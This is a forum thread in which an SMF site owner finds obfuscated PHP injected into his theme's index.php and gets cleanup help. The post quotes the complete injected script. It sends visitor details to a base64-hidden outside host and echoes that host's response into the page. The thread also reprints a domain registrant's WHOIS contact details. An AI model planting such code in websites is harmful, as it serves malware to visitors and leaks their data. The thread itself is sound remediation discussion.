News:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

Obsifucated Code

Started by XHIBIT911, June 29, 2012, 04:21:54 PM

Previous topic - Next topic
Print
Go Down Pages1 2 All
User actions

XHIBIT911

June 29, 2012, 04:21:54 PM Last Edit: June 29, 2012, 04:39:04 PM by XHIBIT911
I found this code in my index.php.  Random people had been saying my site had some type of virus and this is after I had scanned on about 9 website checkers. It happens randomly and only AVG, Nortons and another security suite can detect it.

Code Select
// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }


So the other day when I went to Base64Decode : http://www.base64decode.org/

I entered the string that was in the code below:
Code Select
( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw')

The URL it decoded was this: http://adveconfirm.com/stat/stat.php

I need to know is it safe to find and remove all of this code from any files its located in ?
or just how much of this code needs to go ?

Code Select
// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

busterone

#1
June 29, 2012, 04:56:14 PM
I am not a developer, but I don't think that code is part of SMF. It either came from a unapproved mod that you installed or you have been hacked. The url that the base64 code points to is a reported attack page. That could very well be where I got the "security scan" fake antivirus malware when I visited your site a few days ago. 

XHIBIT911

#2
June 29, 2012, 04:59:18 PM
EXACTLY !

And I when I did a whois check on that site theyre hella shady.
As in very very very shady.
I'll post more about them in a sec...but how much of that code can i remove without destroying my site ?

XHIBIT911

#3
June 29, 2012, 05:06:20 PM
And this is something I discovered about the website that is the cause of the malware and was base64'd on my website.


http://www.dslreports.com/forum/r25294235-Can-someone-check-out-this-site-

After doing a google serach and a whois I'm 1000% certain that this is where it stems from because thats where the code after its debugged tried to open. Here are Google results about the website

https://www.google.com/#hl=en&gs_nf=1&tok=qvGXr_ZufaVukF2eBZMuHw&cp=15&gs_id=6j&xhr=t&q=adveconfirm.com&pf=p&safe=off&output=search&sclient=psy-ab&oq=adveconfirm.com&gs_l=&pbx=1&fp=1&biw=1024&bih=593&bav=on.2,or.r_gc.r_pw.r_qf.,cf.osb&cad=b


Notice how many server and other changes this domain has had in the last year, like theyre trying to cover their tracks.

http://whois.domaintools.com/adveconfirm.com

busterone

#4
June 29, 2012, 05:06:32 PM
Upon just a glace, none of that is SMF code. I just searched a fresh copy of index.php and none of that is in there. It may be from a mod that you have installed, or as I said, you have been hacked. If it is from a mod, uninstall the mod and delete all of that code. If not, delete it anyway.
To be safe, it may even be a better idea to search all your files for any other files that are NOT part of a SMF install. They could be a way to get in to your site.

XHIBIT911

#5
June 29, 2012, 05:09:05 PM
Yeah thats what i was doing, but its so many damn files it could take weeks.

But where do I start and end with that code ?
If I remove to much or too less I can break my forum. I need to know the exact start and stop point

busterone

#6
June 29, 2012, 05:15:26 PM
The easiest way that I know is to get a copy of notepad++ It is free. Download a copy of your index.php and open it with notepad++, then open a clean copy of index.php from the upgrade or install archive. Notepad++ has a file compare feature and will highlight the differences between the two files.

Another option is to upload a fresh copy of SMF files to replace the ones on the server, but then you would also have to reinstall all your modifications afterwards.

XHIBIT911

#7
June 29, 2012, 05:18:29 PM
Youre the MAN !...I'm on it like maggots on a corpse...brb

busterone

#8
June 29, 2012, 05:20:27 PM
Good deal.  :)

XHIBIT911

#9
June 29, 2012, 05:34:19 PM
Ok roadblock..where can i find a clean index.php to download again ?

Colin

#10
June 29, 2012, 05:36:54 PM
Just pull it out of a new release: http://download.simplemachines.org/
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

XHIBIT911

#11
June 29, 2012, 05:37:54 PM
yeah thanks i found it...now I'm just trying to get it into the app to compare

Colin

#12
June 29, 2012, 05:39:32 PM
If you have trouble you can attach it and we can take a look as well. Here is an easy tutorial though: http://www.davidtan.org/how-to-compare-two-text-files-using-notepad-plus/
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

XHIBIT911

#13
June 29, 2012, 05:45:15 PM
yeah i forgot I had to extract the damn thing...Im blonde today I gues...LOL

But its quite a bit of code and I do have so many mods I dont have a clue where its from other than perhaps that spider tracker.

XHIBIT911

#14
June 29, 2012, 06:45:58 PM
Here's more information on that website


AdvEConfirm.com Whois Record

   

Registrar History: 1 registrar
NS History: 4 changes on 5 unique name servers over 0 year.
IP History: 10 changes on 11 unique IP addresses over 0 years.
Whois History: 23 records have been archived since 2012-02-14 .
Dedicated Hosting: adveconfirm.com is hosted on a dedicated server.

Registrant Contact:
   NA
   Vadim Ivanov
   +74967164758 fax: +74967164758
   Ul. Centralnaya, dom 6, kv. 38
   Dubna Moscovskaya oblast 141983
   ru

Administrative Contact:
   Vadim Ivanov
   +74967164758 fax: +74967164758
   Ul. Centralnaya, dom 6, kv. 38
   Dubna Moscovskaya oblast 141983

busterone

#15
June 29, 2012, 06:54:57 PM
Ok, the index.php you had infected was from your /Themes directory, not the main index.php.
Use the attached one here to replace the one in your /Themes/ directory

There still may be a security exploit somewhere on your site for them to get access originally. This will stop the base64 stuff though.

XHIBIT911

#16
June 29, 2012, 06:56:17 PM
Yeah I know...thats where the code was located in my themes directory.  or did I upload two seperate index.php's altogether ? GRRRR

XHIBIT911

#17
June 29, 2012, 07:03:49 PM
Just to make sure I sent the correct two again

The index(onsite).php is the one currently in online that I found the code in my themes directory index.

The second one is a fresh uninstalled index(fresh).php

busterone

#18
June 29, 2012, 10:47:37 PM
Yep, the fresh copy is the same as the one I attached above, and the onsite copy has been altered by an outside source. Go ahead and replace the onsite file with the fresh copy to eliminate the base64 exploit. Then, I would look through all your files for any more base64 encoded stuff inserted. Also look for odd named php files in your forum such as 100001.php etc. They got in somehow.

If you have any other scripts installed in your webspace, there could be a vulnerability there also. It may be a good idea to get your host involved as well in the event there is a server side weakness on their part.

XHIBIT911

#19
June 29, 2012, 11:03:20 PM
New fresh index.php installed and I scanned it right now and avira didnt list the black hole exploit this time but shows the old 30 day report so I still dont know if that got it. can someone who has AVG security installed on their pc check by going to my site ?

http://www.pshomesource.com
Print
Go Up Pages1 2 All
User actions
Advertisement: